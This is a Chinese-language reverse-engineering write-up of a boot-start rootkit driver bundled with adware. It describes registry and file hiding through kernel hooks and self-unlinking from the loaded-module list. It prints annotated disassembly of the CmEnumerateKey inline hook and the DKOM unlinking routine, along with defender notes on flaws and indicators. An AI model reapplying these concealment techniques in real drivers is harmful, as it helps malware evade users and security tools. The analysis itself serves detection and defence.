BY mj0011
u88财富快车流氓软件 RK 驱动分析

RK 部分一共三个文件：VideoAti0.sys、VideoAti0.dll、VideoAti0.exe。驱动部分是 BOOT 启动（Start=0）的，主要干了这么些事：

1. 建立 CreateProcessNotifyRoutine，检测到 userinit.exe 加载后就修改注册表 Run 项目，以启动 VideoAti0.exe；VideoAti0.exe 启动后会删除自己的 Run 项目，并注入 VideoAti0.dll，导致系统启动后无法发现其启动项目。

2. Hook CmEnumerateKey，隐藏 VideoAti0.sys 的服务项，IS、gmer、rku 等无法检测到。通过 CreateProcessNotifyRoutine 检测到是如下进程调用 CmEnumerateKey 时，会恢复自己的 HOOK，企图蒙混过关：Dfhs.exe、knlsc13.exe。

3. Hook FSD Dispatch Routine，Hook 了 \FileSystem\Ntfs 和 \FileSystem\FastFat 的 IRP_MJ_CREATE 和 IRP_MJ_DIRECTORY_FILE；根据默认规则库，会首先过滤 VideoAti0.sys、VideoAti0.dll、VideoAti0.exe，使其无法被列出。规则库还可以通过 R3 向 R0 添加。

4. 从 PsLoadedModuleList 移除了自身，使得 IS、gmer 等工具无法检测到它；gmer 可检测到 FSD HOOK，但也检测不到是哪个 module 作了 HOOK。

后来 R3 的规则好象很 BT，系统登录后加载任何位置的 driver 都会失败 :D

分析后的 idb 文件见压缩包，和读源代码没什么区别了。
摘点代码：
; NewCMEnumerateKey -- the driver's replacement for CmEnumerateKey.
; Same six-dword stdcall signature as the routine it patches (retn 18h):
;   arg_0 = key, arg_4 = index, arg_8 = information class,
;   arg_C = information buffer, arg_10 = buffer length, arg_14 = result length.
; Flow:
;   1. raise IRQL, clear write protection, copy the 6 saved bytes (unk_14390)
;      back over CmEnumerateKeyAddress (temporary un-hook), then call the real
;      routine with index + dword_14374;
;   2. on a non-negative status: if the caller is "fhs.exe" or "knlsc13.exe",
;      log its name and do NOT filter; otherwise walk the HideReg list and, on a
;      case-insensitive prefix match against the returned key name, set
;      dword_14374 = 1 and re-query with index + 1 (the hidden entry is skipped);
;   3. at StopHook re-write the 6-byte "push NewCMEnumerateKey / ret" patch,
;      lower IRQL and return the saved NTSTATUS.
; Defender notes (all visible below):
;   - the patch is in place at rest and removed only while the original runs;
;     the IRQL raise is per-CPU and there is no interlock, so another CPU
;     entering CmEnumerateKey in that window reaches the unfiltered original;
;   - dword_14374 is a single global skip offset shared by every caller, not
;     per-handle state, so concurrent enumerations interfere with each other;
;   - the result of the re-query is never compared against HideReg again, so
;     two adjacent hidden keys would expose the second one;
;   - the DbgPrint format strings ("ProcessName:%S", "Found HideReg:%S") are
;     usable as static indicators; the trailing "/n" is most likely "\n"
;     mangled by extraction.
.text:000112D4 NewCMEnumerateKey proc near ; DATA XREF: ReadyHardCodeAndHook+1DBo
.text:000112D4 ; NewCMEnumerateKey+14Co
.text:000112D4
.text:000112D4 var_24 = byte ptr -24h ; caller image name (filled by GetCurrentCallProcess)
.text:000112D4 NewIrql = byte ptr -1 ; IRQL to restore after the code patch
.text:000112D4 arg_0 = dword ptr 8
.text:000112D4 arg_4 = dword ptr 0Ch ; index on entry; reused below to hold the return status
.text:000112D4 arg_8 = dword ptr 10h
.text:000112D4 arg_C = dword ptr 14h
.text:000112D4 arg_10 = dword ptr 18h
.text:000112D4 arg_14 = dword ptr 1Ch
.text:000112D4
.text:000112D4 push ebp
.text:000112D5 mov ebp, esp
.text:000112D7 sub esp, 24h
.text:000112DA push ebx
.text:000112DB push esi
.text:000112DC push edi
.text:000112DD call ds:KeRaiseIrqlToDpcLevel ; this CPU only; no cross-CPU sync for the patch
.text:000112E3 mov [ebp+NewIrql], al
.text:000112E6 call WP_OFF ; helper not on this page; presumably clears CR0.WP
.text:000112E6
.text:000112EB pushf
.text:000112EC pusha
.text:000112ED lea esi, unk_14390 ; 6 original bytes saved at hook time
.text:000112F3 mov edi, CmEnumerateKeyAddress
.text:000112F9 mov ecx, 6
.text:000112FE cld
.text:000112FF rep movsb ; restore original prologue: hook removed for the duration of the call
.text:00011301 popa
.text:00011302 popf
.text:00011303 call WP_ON
.text:00011303
.text:00011308 mov cl, [ebp+NewIrql] ; NewIrql
.text:0001130B call ds:KfLowerIrql
.text:00011311 push [ebp+arg_14]
.text:00011314 mov ebx, [ebp+arg_C] ; ebx = information buffer, used for the name compare below
.text:00011317 mov esi, [ebp+arg_4]
.text:0001131A push [ebp+arg_10]
.text:0001131D add esi, dword_14374 ; esi = index + global skip offset (0 or 1)
.text:00011323 push ebx
.text:00011324 push [ebp+arg_8]
.text:00011327 push esi
.text:00011328 push [ebp+arg_0]
.text:0001132B call OldcmEnumerateKey ; real routine, reached while the patch is absent
.text:00011331 test eax, eax
.text:00011333 mov [ebp+arg_4], eax ; save NTSTATUS (mov leaves flags from the test intact)
.text:00011336 jge short loc_11342 ; non-negative status -> filtering path
.text:00011336
.text:00011338 cmp eax, 8000001Ah ; STATUS_NO_MORE_ENTRIES?
.text:0001133D jmp loc_113FF ; -> jnz StopHook; on equality the skip offset is reset
.text:0001133D
.text:00011342 ; ---------------------------------------------------------------------------
.text:00011342
.text:00011342 loc_11342: ; CODE XREF: NewCMEnumerateKey+62j
.text:00011342 lea eax, [ebp+var_24]
.text:00011345 push eax ; char *
.text:00011346 call GetCurrentCallProcess ; writes caller image name into var_24 (helper not on this page)
.text:00011346
.text:0001134B mov edi, ds:_stricmp
.text:00011351 lea eax, [ebp+var_24]
.text:00011354 push offset s_Fhs_exe ; "fhs.exe"
.text:00011359 push eax ; char *
.text:0001135A call edi ; _stricmp
.text:0001135C pop ecx
.text:0001135D test eax, eax
.text:0001135F pop ecx
.text:00011360 jnz short loc_1136D
.text:00011360
.text:00011362 lea eax, [ebp+var_24]
.text:00011365 push eax
.text:00011366 push offset s_ProcessnameS ; "ProcessName:%S/n"
.text:0001136B jmp short loc_11387 ; whitelisted caller: log and skip the HideReg walk
.text:0001136B
.text:0001136D ; ---------------------------------------------------------------------------
.text:0001136D
.text:0001136D loc_1136D: ; CODE XREF: NewCMEnumerateKey+8Cj
.text:0001136D lea eax, [ebp+var_24]
.text:00011370 push offset s_Knlsc13_exe ; "knlsc13.exe"
.text:00011375 push eax ; char *
.text:00011376 call edi ; _stricmp
.text:00011378 pop ecx
.text:00011379 test eax, eax
.text:0001137B pop ecx
.text:0001137C jnz short loc_11390
.text:0001137C
.text:0001137E lea eax, [ebp+var_24]
.text:00011381 push eax
.text:00011382 push offset s_Processname_0 ; "ProcessName:%S/n"
.text:00011382
.text:00011387
.text:00011387 loc_11387: ; CODE XREF: NewCMEnumerateKey+97j
.text:00011387 call DbgPrint ; observable on a kernel debugger / DbgView when debug output is enabled
.text:00011387
.text:0001138C pop ecx
.text:0001138D pop ecx
.text:0001138E jmp short StopHook ; the hook is still re-installed for whitelisted callers
.text:0001138E
.text:00011390 ; ---------------------------------------------------------------------------
.text:00011390
.text:00011390 loc_11390: ; CODE XREF: NewCMEnumerateKey+A8j
.text:00011390 mov edi, dword_1439C ; head of the HideReg list; node layout: [edi-8] = name, [edi+4] = next
.text:00011390
.text:00011396
.text:00011396 loc_11396: ; CODE XREF: NewCMEnumerateKey+EFj
.text:00011396 cmp edi, offset HideReg ; end-of-list sentinel
.text:0001139C jz short StopHook
.text:0001139C
.text:0001139E test edi, edi ; NULL also ends the walk
.text:000113A0 jz short StopHook
.text:000113A0
.text:000113A2 push dword ptr [edi-8] ; wchar_t *
.text:000113A5 call ds:wcslen
.text:000113AB push eax ; size_t -- compare length = length of the pattern, i.e. a prefix match
.text:000113AC lea eax, [ebx+10h] ; name at +10h of the buffer (matches KEY_BASIC_INFORMATION.Name; other classes not special-cased)
.text:000113AF push eax ; wchar_t *
.text:000113B0 push dword ptr [edi-8] ; wchar_t *
.text:000113B3 call ds:_wcsnicmp ; case-insensitive
.text:000113B9 add esp, 10h
.text:000113BC test eax, eax
.text:000113BE jz short loc_113C5
.text:000113BE
.text:000113C0 mov edi, [edi+4] ; next node
.text:000113C3 jmp short loc_11396
.text:000113C3
.text:000113C5 ; ---------------------------------------------------------------------------
.text:000113C5
.text:000113C5 loc_113C5: ; CODE XREF: NewCMEnumerateKey+EAj
.text:000113C5 push dword ptr [edi-8]
.text:000113C8 push offset s_FoundHideregS ; "Found HideReg:%S/n"
.text:000113CD call DbgPrint
.text:000113CD
.text:000113D2 pop ecx
.text:000113D3 inc esi ; skip the matching entry: re-query index + 1
.text:000113D4 pop ecx
.text:000113D5 mov dword_14374, 1 ; remember the shift for later indices (global, shared by all callers)
.text:000113DF push [ebp+arg_14]
.text:000113E2 push [ebp+arg_10]
.text:000113E5 push ebx
.text:000113E6 push [ebp+arg_8]
.text:000113E9 push esi
.text:000113EA push [ebp+arg_0]
.text:000113ED call OldcmEnumerateKey ; result of this second query is not re-checked against HideReg
.text:000113F3 test eax, eax
.text:000113F5 mov [ebp+arg_4], eax
.text:000113F8 jge short StopHook
.text:000113F8
.text:000113FA cmp eax, 8000001Ah ; STATUS_NO_MORE_ENTRIES?
.text:000113FA
.text:000113FF
.text:000113FF loc_113FF: ; CODE XREF: NewCMEnumerateKey+69j
.text:000113FF jnz short StopHook ; also the target of the jmp at 1133D, reusing that cmp's flags
.text:000113FF
.text:00011401 and dword_14374, 0 ; enumeration finished: clear the skip offset
.text:00011401
.text:00011408
.text:00011408 StopHook: ; CODE XREF: NewCMEnumerateKey+BAj
.text:00011408 ; NewCMEnumerateKey+C8j
.text:00011408 ; NewCMEnumerateKey+CCj
.text:00011408 ; NewCMEnumerateKey+124j
.text:00011408 ; NewCMEnumerateKey:loc_113FFj
.text:00011408 call ds:KeRaiseIrqlToDpcLevel
.text:0001140E mov [ebp+NewIrql], al
.text:00011411 call WP_OFF
.text:00011411
.text:00011416 pusha
.text:00011417 mov edi, CmEnumerateKeyAddress
.text:0001141D mov al, 68h ; opcode: push imm32
.text:0001141F stosb
.text:00011420 lea eax, NewCMEnumerateKey
.text:00011426 stosd ; imm32 = address of this routine
.text:00011427 mov al, 0C3h ; opcode: ret -- 6-byte push/ret trampoline re-installed
.text:00011429 stosb
.text:0001142A popa
.text:0001142B call WP_ON
.text:0001142B
.text:00011430 mov cl, [ebp+NewIrql] ; NewIrql
.text:00011433 call ds:KfLowerIrql
.text:00011439 mov eax, [ebp+arg_4] ; return the saved NTSTATUS
.text:0001143C pop edi
.text:0001143D pop esi
.text:0001143E pop ebx
.text:0001143F leave
.text:00011440 retn 18h ; six dword args (stdcall)
.text:00011440
.text:00011440 NewCMEnumerateKey endp
; RemoveMyselfFormPsLoadModuleLIst -- unlinks this driver's loader entry from
; PsLoadedModuleList (DKOM) so that module enumeration based on that list does
; not show it. Called once from the driver entry (xref: start).
; Walk: start at head->Flink and stop when the walk returns to it; for every
; entry with a non-zero dword at +20h and a valid, non-NULL pointer at +28h,
; copy (+24h)/2 wide chars into a zeroed 208h-byte stack buffer, lower-case
; it and search for "videoati0"; on the first hit, unlink the entry from the
; Flink/Blink pair at +0/+4 and return.
; The +20h/+24h/+28h reads are consistent with SizeOfImage and
; FullDllName.Length/.Buffer of the 32-bit LDR_DATA_TABLE_ENTRY --
; TODO confirm against the target OS build.
; Defender notes (all visible below):
;   - only the +0/+4 links are rewritten; the entry stays allocated and its own
;     Flink/Blink still point into the list, which is what pool-scanning and
;     cross-view tools key on; no other link pair is touched here;
;   - the walk also visits the list head itself on its way round; reads of the
;     head's +20h/+28h are guarded only by the zero check and MmIsAddressValid;
;   - wcsncpy is given Length/2 with no bound against the 104h-wchar buffer and
;     no terminator is written when the name fills it, so the following
;     _wcslwr/wcsstr would run past the buffer for an over-long name.
.text:00011794 RemoveMyselfFormPsLoadModuleLIst proc near ; CODE XREF: start:loc_1049Fp
.text:00011794
.text:00011794 var_208 = word ptr -208h ; 104h-wchar scratch copy of the module name
.text:00011794
.text:00011794 push ebp
.text:00011795 mov ebp, esp
.text:00011797 sub esp, 208h
.text:0001179D and [ebp+var_208], 0 ; first word of the buffer
.text:000117A5 push esi
.text:000117A6 push edi
.text:000117A7 mov ecx, 81h
.text:000117AC xor eax, eax
.text:000117AE lea edi, [ebp-206h]
.text:000117B4 rep stosd ; 81h dwords ...
.text:000117B6 stosw ; ... + 1 word: the remaining 206h bytes, buffer now all zero
.text:000117B8 mov eax, PsLoadedModuleList
.text:000117BD mov edi, [eax] ; edi = head->Flink (first entry); also the loop terminator
.text:000117BF mov esi, edi ; esi = current entry
.text:000117BF
.text:000117C1
.text:000117C1 loc_117C1: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+88j
.text:000117C1 cmp dword ptr [esi+20h], 0 ; SizeOfImage == 0 -> skip entry
.text:000117C5 jz short loc_11816
.text:000117C5
.text:000117C7 push dword ptr [esi+28h] ; VirtualAddress -- FullDllName.Buffer
.text:000117CA call ds:MmIsAddressValid ; checks only the page the pointer lands on
.text:000117D0 test al, al
.text:000117D2 jz short loc_11816
.text:000117D2
.text:000117D4 mov eax, [esi+28h]
.text:000117D7 test eax, eax ; NULL buffer -> skip entry
.text:000117D9 jz short loc_11816
.text:000117D9
.text:000117DB movzx ecx, word ptr [esi+24h] ; FullDllName.Length (bytes)
.text:000117DF shr ecx, 1 ; -> wchar count, passed unbounded to wcsncpy
.text:000117E1 push ecx ; size_t
.text:000117E2 push eax ; wchar_t *
.text:000117E3 lea eax, [ebp+var_208]
.text:000117E9 push eax ; wchar_t *
.text:000117EA call ds:wcsncpy
.text:000117F0 lea eax, [ebp+var_208]
.text:000117F6 push eax ; wchar_t *
.text:000117F7 call ds:_wcslwr ; in-place lower-case so the match below is case-insensitive
.text:000117FD lea eax, [ebp+var_208]
.text:00011803 push offset s_Videoati0 ; "videoati0"
.text:00011808 push eax ; wchar_t *
.text:00011809 call ds:wcsstr ; substring match anywhere in the full path
.text:0001180F add esp, 18h ; pop the six cdecl args of the three calls above
.text:00011812 test eax, eax
.text:00011814 jnz short loc_1181E ; found our own entry
.text:00011814
.text:00011816
.text:00011816 loc_11816: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+31j
.text:00011816 ; RemoveMyselfFormPsLoadModuleLIst+3Ej
.text:00011816 ; RemoveMyselfFormPsLoadModuleLIst+45j
.text:00011816 mov esi, [esi] ; next = Flink
.text:00011818 cmp esi, edi ; back at the first entry -> done without a match
.text:0001181A jz short loc_11828
.text:0001181A
.text:0001181C jmp short loc_117C1
.text:0001181C
.text:0001181E ; ---------------------------------------------------------------------------
.text:0001181E
.text:0001181E loc_1181E: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+80j
.text:0001181E mov eax, [esi] ; eax = entry->Flink
.text:00011820 mov esi, [esi+4] ; esi = entry->Blink
.text:00011823 mov [eax+4], esi ; Flink->Blink = Blink
.text:00011826 mov [esi], eax ; Blink->Flink = Flink; the entry's own links are left as they were
.text:00011826
.text:00011828
.text:00011828 loc_11828: ; CODE XREF: RemoveMyselfFormPsLoadModuleLIst+86j
.text:00011828 pop edi
.text:00011829 pop esi
.text:0001182A leave
.text:0001182B retn ; no arguments; returns after the first match (or after one full pass)
.text:0001182B
.text:0001182B RemoveMyselfFormPsLoadModuleLIst endp